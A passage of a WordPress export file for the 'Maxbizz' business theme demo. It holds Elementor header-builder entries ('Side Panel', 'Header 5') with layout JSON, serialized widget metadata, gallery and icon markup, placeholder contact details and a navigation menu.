0.3)","icon_color":"custom","hover_border_color":"#4B82FB","icon_secondary_color":"#8497A5","hover_secondary_color":"#FFFFFF","icon_padding":{"unit":"em","size":0,"sizes":[]}},"elements":[],"widgetType":"social-icons"},{"id":"eb90cd2","elType":"widget","settings":{"text":"FREE QUOTE","typography_typography":"custom","typography_font_family":"Open Sans","typography_font_size":{"unit":"px","size":14,"sizes":[]},"typography_font_weight":"500","background_color":"#55BB53","hover_color":"#0B2A41","button_background_hover_color":"#F5F5F5","button_hover_border_color":"#55BB53","border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":true},"text_padding":{"unit":"px","top":"13","right":"29","bottom":"12","left":"29","isLinked":false},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"10","isLinked":false},"typography_line_height":{"unit":"px","size":"","sizes":[]}},"elements":[],"widgetType":"button"}],"isInner":false}],"isInner":false},{"id":"36d15d3","elType":"section","settings":{"structure":"20","box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":15,"vertical":15,"blur":38,"spread":0,"color":"rgba(0, 0, 0, 0.1)"}},"elements":[{"id":"5bfa0e8","elType":"column","settings":{"_column_size":50,"_inline_size":30},"elements":[{"id":"4aa2514","elType":"widget","settings":{"logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/04_Black.svg","id":383},"_padding":{"unit":"px","top":"26","right":"0","bottom":"27","left":"0","isLinked":false},"logo_width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"ilogo"}],"isInner":false},{"id":"b62b09b","elType":"column","settings":{"_column_size":50,"_inline_size":70,"align":"flex-end","_ot_content_align":"horizontal"},"elements":[{"id":"d943b8e","elType":"widget","settings":{"nav_menu":"main-menu","text_hover_color":"#55BB53","menu_typography_typography":"custom","menu_typography_font_family":"Open Sans","smenu_typography_typography":"custom","smenu_typography_font_family":"Open Sans"},"elements":[],"widgetType":"imenu"},{"id":"8ed40b8","elType":"widget","settings":{"bg_count":"#55BB53","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"80","isLinked":false}},"elements":[],"widgetType":"icart"},{"id":"64ad134","elType":"widget","settings":{"bg_btn":"#55BB53","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"20","isLinked":false}},"elements":[],"widgetType":"isearch"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:5;s:8:"controls";a:2:{s:7:"content";a:1:{s:12:"section_icon";a:2:{s:4:"view";i:1;s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:6:{s:10:"text_color";i:1;s:11:"text_indent";i:1;s:26:"icon_typography_typography";i:1;s:25:"icon_typography_font_size";i:1;s:27:"icon_typography_line_height";i:1;s:27:"icon_typography_font_weight";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:4;s:5:"align";i:2;s:17:"_ot_content_align";i:2;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:5;s:8:"controls";a:2:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:5:"shape";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:7:{s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:10:"icon_color";i:1;s:20:"icon_secondary_color";i:1;s:12:"icon_padding";i:1;}s:20:"section_social_hover";a:2:{s:18:"hover_border_color";i:1;s:21:"hover_secondary_color";i:1;}}}}s:6:"button";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_button";a:1:{s:4:"text";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:13:{s:21:"typography_typography";i:1;s:22:"typography_font_family";i:1;s:20:"typography_font_size";i:1;s:22:"typography_font_weight";i:1;s:16:"background_color";i:1;s:11:"hover_color";i:1;s:29:"button_background_hover_color";i:1;s:25:"button_hover_border_color";i:1;s:12:"border_width";i:1;s:12:"border_color";i:1;s:13:"border_radius";i:1;s:12:"text_padding";i:1;s:22:"typography_line_height";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:1:{s:16:"content_position";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:2;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:2:{s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:6:"margin";i:1;}}}}s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"logo_image";i:1;s:10:"logo_width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:5:"imenu";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:1:{s:5:"style";a:2:{s:18:"style_menu_section";a:3:{s:16:"text_hover_color";i:1;s:26:"menu_typography_typography";i:1;s:27:"menu_typography_font_family";i:1;}s:19:"style_smenu_section";a:2:{s:27:"smenu_typography_typography";i:1;s:28:"smenu_typography_font_family";i:1;}}}}s:5:"icart";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:8:"bg_count";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:7:"isearch";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:5:"style";a:1:{s:18:"style_form_section";a:1:{s:6:"bg_btn";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Side Panel</title>
		<link>http://wpdemo.archiwp.com/maxbizz/ot_header_builders/side-panel/</link>
		<pubDate>Fri, 24 Apr 2020 07:40:59 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/?post_type=ot_header_builders&#038;p=253</guid>
		<description></description>
		<content:encoded><![CDATA[<a href="http://wpdemo.archiwp.com/maxbizz/">
					<img src="http://wpdemo.archiwp.com/maxbizz/wp-content/themes/maxbizz/images/logo.svg" alt="Maxbizz">
				</a>			        
		Over 10 years we help companies reach their financial and branding goals. Maxbizz is a values-driven consulting agency dedicated.		
			<h4>Gallery</h4>		
			<figure class='gallery-item'>
				<a data-elementor-open-lightbox="yes" data-elementor-lightbox-slideshow="0979c03" data-elementor-lightbox-title="project-10" href='https://maxbizz.s3.amazonaws.com/images/project-10.jpg'><img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-10-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-10-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-10-150x150.jpg 150w" sizes="(max-width: 600px) 100vw, 600px" /></a>
			</figure><figure class='gallery-item'>
				<a data-elementor-open-lightbox="yes" data-elementor-lightbox-slideshow="0979c03" data-elementor-lightbox-title="project-12" href='https://maxbizz.s3.amazonaws.com/images/project-12.jpg'><img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-12-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-12-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-12-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-12-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project-12.jpg 605w" sizes="(max-width: 600px) 100vw, 600px" /></a>
			</figure><figure class='gallery-item'>
				<a data-elementor-open-lightbox="yes" data-elementor-lightbox-slideshow="0979c03" data-elementor-lightbox-title="project-9" href='https://maxbizz.s3.amazonaws.com/images/project-9.jpg'><img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-9-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-9-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-9-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-9-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project-9.jpg 605w" sizes="(max-width: 600px) 100vw, 600px" /></a>
			</figure><figure class='gallery-item'>
				<a data-elementor-open-lightbox="yes" data-elementor-lightbox-slideshow="0979c03" data-elementor-lightbox-title="project-7" href='https://maxbizz.s3.amazonaws.com/images/project-7.jpg'><img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-7-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-7-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-7-150x150.jpg 150w" sizes="(max-width: 600px) 100vw, 600px" /></a>
			</figure><figure class='gallery-item'>
				<a data-elementor-open-lightbox="yes" data-elementor-lightbox-slideshow="0979c03" data-elementor-lightbox-title="project-6" href='https://maxbizz.s3.amazonaws.com/images/project-6.jpg'><img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-6-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-6-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-6-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-6-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project-6.jpg 605w" sizes="(max-width: 600px) 100vw, 600px" /></a>
			</figure><figure class='gallery-item'>
				<a data-elementor-open-lightbox="yes" data-elementor-lightbox-slideshow="0979c03" data-elementor-lightbox-title="project-5" href='https://maxbizz.s3.amazonaws.com/images/project-5.jpg'><img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-5-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-5-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-5-150x150.jpg 150w" sizes="(max-width: 600px) 100vw, 600px" /></a>
			</figure>
			<h4>Contact</h4>		
				<a href="tel:+1-800-456-478-23">
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve">
<g>
	<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</svg>				</a>
				<h6>
					<a href="tel:+1-800-456-478-23"></a>
				</h6>
								<p>+1-800-456-478-23</p>
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
</svg>				
				<h6>
				</h6>
								<p>411 University St, Seattle</p>
				<a href="mailto:%20maxbizz@mail.com">
				<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m8.75 17.612v4.638c0 .324.208.611.516.713.077.025.156.037.234.037.234 0 .46-.11.604-.306l2.713-3.692z"></path><path d="m23.685.139c-.23-.163-.532-.185-.782-.054l-22.5 11.75c-.266.139-.423.423-.401.722.023.3.222.556.505.653l6.255 2.138 13.321-11.39-10.308 12.419 10.483 3.583c.078.026.16.04.242.04.136 0 .271-.037.39-.109.19-.116.319-.311.352-.53l2.75-18.5c.041-.28-.077-.558-.307-.722z"></path></svg>				</a>
				<h6>
					<a href="mailto:%20maxbizz@mail.com"></a>
				</h6>
								<p>maxbizz@mail.com</p>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Instagram
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>253</wp:post_id>
		<wp:post_date><![CDATA[2020-04-24 07:40:59]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-04-24 07:40:59]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[side-panel]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_header_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"abdb372","elType":"section","settings":{"padding":{"unit":"px","top":"40","right":"40","bottom":"40","left":"40","isLinked":true}},"elements":[{"id":"42dd159","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"99ef7b3","elType":"widget","settings":{"logo_width":{"unit":"px","size":145,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"ilogo"},{"id":"4408930","elType":"widget","settings":{"editor":"Over 10 years we help companies reach their financial and branding goals. Maxbizz is a values-driven consulting agency dedicated.","_margin":{"unit":"px","top":"0","right":"0","bottom":"27","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"561f157","elType":"widget","settings":{"title":"Gallery","_margin":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"header_size":"h4","typography_typography":"custom","typography_font_weight":"700","typography_font_size":{"unit":"px","size":22,"sizes":[]}},"elements":[],"widgetType":"heading"},{"id":"0979c03","elType":"widget","settings":{"wp_gallery":[{"id":800,"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-10.jpg"},{"id":803,"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-12.jpg"},{"id":811,"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-9.jpg"},{"id":819,"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-7.jpg"},{"id":827,"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-6.jpg"},{"id":823,"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-5.jpg"}],"gallery_columns":"3","thumbnail_size":"maxbizz-portfolio-thumbnail-grid","open_lightbox":"yes"},"elements":[],"widgetType":"image-gallery"},{"id":"81b5457","elType":"widget","settings":{"title":"Contact","_margin":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"header_size":"h4","typography_typography":"custom","typography_font_weight":"700","typography_font_size":{"unit":"px","size":22,"sizes":[]}},"elements":[],"widgetType":"heading"},{"id":"dfc527a","elType":"widget","settings":{"title_text":"","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#FF8523","icon_size":{"unit":"px","size":20,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":3,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"500","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":1420},"library":"svg"},"title_color":"#5F5F5F","title_typography_font_family":"Open Sans","description_color":"#606060","description_typography_font_family":"Inter","_margin":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"icon-box"},{"id":"a86f8fa","elType":"widget","settings":{"title_text":"","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#FF8523","icon_size":{"unit":"px","size":22,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":3,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":15,"sizes":[]},"title_typography_font_weight":"500","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"500","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":1419},"library":"svg"},"title_color":"#606060","title_typography_font_family":"Inter","description_color":"#606060","description_typography_font_family":"Inter","_margin":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"c0cbcd5","elType":"widget","settings":{"title_text":"","description_text":"maxbizz@mail.com","position":"left","title_size":"h6","primary_color":"#FF8523","icon_size":{"unit":"px","size":20,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":3,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"500","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/send.svg","id":374},"library":"svg"},"title_color":"#5F5F5F","title_typography_font_family":"Open Sans","description_color":"#606060","description_typography_font_family":"Inter","_margin":{"unit":"px","top":"0","right":"0","bottom":"35","left":"0","isLinked":false},"link":{"url":"mailto: maxbizz@mail.com","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"icon-box"},{"id":"ca934ca","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"0d77827","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""}},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"04b0949","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""}},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"d468e5b","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"#E40000"},{"social_icon":{"value":"fab fa-instagram","library":"fa-brands"},"link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"#FF8523","_id":"e7140d6"}],"shape":"circle","align":"left","icon_size":{"unit":"px","size":13,"sizes":[]},"icon_padding":{"unit":"em","size":0.6999999999999999555910790149937383830547332763671875,"sizes":[]},"icon_spacing":{"unit":"px","size":12,"sizes":[]},"image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(0, 0, 0, 0.2)","icon_color":"custom","hover_animation":"float","columns":"4"},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-07-24]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:8:{s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:10:"logo_width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:2;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:2;s:11:"header_size";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:2;}}s:5:"style";a:1:{s:19:"section_title_style";a:3:{s:21:"typography_typography";i:2;s:22:"typography_font_weight";i:2;s:20:"typography_font_size";i:2;}}}}s:13:"image-gallery";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:1:{s:7:"content";a:1:{s:15:"section_gallery";a:4:{s:10:"wp_gallery";i:1;s:15:"gallery_columns";i:1;s:14:"thumbnail_size";i:1;s:13:"open_lightbox";i:1;}}}}s:8:"icon-box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:9;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:3;s:16:"description_text";i:3;s:8:"position";i:3;s:10:"title_size";i:3;s:13:"selected_icon";i:3;s:4:"link";i:2;}}s:5:"style";a:2:{s:18:"section_style_icon";a:3:{s:13:"primary_color";i:3;s:9:"icon_size";i:3;s:6:"rotate";i:3;}s:21:"section_style_content";a:12:{s:26:"content_vertical_alignment";i:3;s:18:"title_bottom_space";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;s:33:"description_typography_typography";i:3;s:32:"description_typography_font_size";i:3;s:34:"description_typography_font_weight";i:3;s:11:"title_color";i:3;s:28:"title_typography_font_family";i:3;s:17:"description_color";i:3;s:34:"description_typography_font_family";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:3;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:5;s:8:"controls";a:2:{s:7:"content";a:1:{s:19:"section_social_icon";a:4:{s:16:"social_icon_list";i:1;s:5:"shape";i:1;s:5:"align";i:1;s:7:"columns";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:6:{s:9:"icon_size";i:1;s:12:"icon_padding";i:1;s:12:"icon_spacing";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:10:"icon_color";i:1;}s:20:"section_social_hover";a:1:{s:15:"hover_animation";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:1;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:1:{s:12:"_inline_size";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:1;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:7:"padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Header 5</title>
		<link>http://wpdemo.archiwp.com/maxbizz/ot_header_builders/header-5/</link>
		<pubDate>Fri, 24 Jul 2020 08:06:39 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/?post_type=ot_header_builders&#038;p=267</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Maxbizz The Largest Business Expert in USA &amp; Europe. We Provide The Solutions to Grow Your Business.</p>		
			<a href="#" role="button">
						CONTACT US
					</a>
				<a href="http://wpdemo.archiwp.com/maxbizz/">
					<img src="https://maxbizz.s3.amazonaws.com/images/05_Black.svg" alt="Maxbizz">
				</a>			        
				<a href="tel:+1-800-456-478-23">
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve">
<g>
	<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</svg>				</a>
				<h6>
					<a href="tel:+1-800-456-478-23">Have Any Questions?</a>
				</h6>
								<p>+1-800-456-478-23</p>
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
</svg>				
				<h6>
					Visit Us Daily
				</h6>
								<p>411 University St, Seattle</p>
				<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 384"><path d="m343.59375 101.039062c-7.953125 3.847657-11.28125 13.417969-7.433594 21.367188 10.511719 21.714844 15.839844 45.121094 15.839844 69.59375 0 88.222656-71.777344 160-160 160s-160-71.777344-160-160 71.777344-160 160-160c36.558594 0 70.902344 11.9375 99.328125 34.519531 6.894531 5.503907 16.976563 4.351563 22.480469-2.566406 5.503906-6.914063 4.351562-16.984375-2.570313-22.480469-33.652343-26.746094-76-41.472656-119.238281-41.472656-105.863281 0-192 86.136719-192 192s86.136719 192 192 192 192-86.136719 192-192c0-29.335938-6.40625-57.449219-19.039062-83.527344-3.839844-7.96875-13.441407-11.289062-21.367188-7.433594zm0 0"></path><path d="m192 64c-8.832031 0-16 7.167969-16 16v112c0 8.832031 7.167969 16 16 16h80c8.832031 0 16-7.167969 16-16s-7.167969-16-16-16h-64v-96c0-8.832031-7.167969-16-16-16zm0 0"></path></svg>				
				<h6>
					Our Working Hours
				</h6>
								<p>Mon - Sat: 8.00 - 18.00</p>
						<nav id="site-navigation">			
				<ul id="primary-menu"><li id="menu-item-361"><a href="http://wpdemo.archiwp.com/maxbizz/">Home</a></li>
<li id="menu-item-363"><a href="#">Pages</a>
<ul>
	<li id="menu-item-759"><a href="http://wpdemo.archiwp.com/maxbizz/about-us/">About Us</a></li>
	<li id="menu-item-1043"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/">Our Services 1</a></li>
	<li id="menu-item-1021"><a href="http://wpdemo.archiwp.com/maxbizz/services-with-icon/">Our Services 2</a></li>
	<li id="menu-item-764"><a href="http://wpdemo.archiwp.com/maxbizz/our-core-values/">Our Core Values</a></li>
	<li id="menu-item-765"><a href="http://wpdemo.archiwp.com/maxbizz/our-team/">Our Team</a></li>
	<li id="menu-item-766"><a href="http://wpdemo.archiwp.com/maxbizz/our-team/single-team/">Single Team</a></li>
	<li id="menu-item-762"><a href="http://wpdemo.archiwp.com/maxbizz/elements/">Elements</a></li>
	<li id="menu-item-767"><a href="http://wpdemo.archiwp.com/maxbizz/typography/">Typography</a></li>
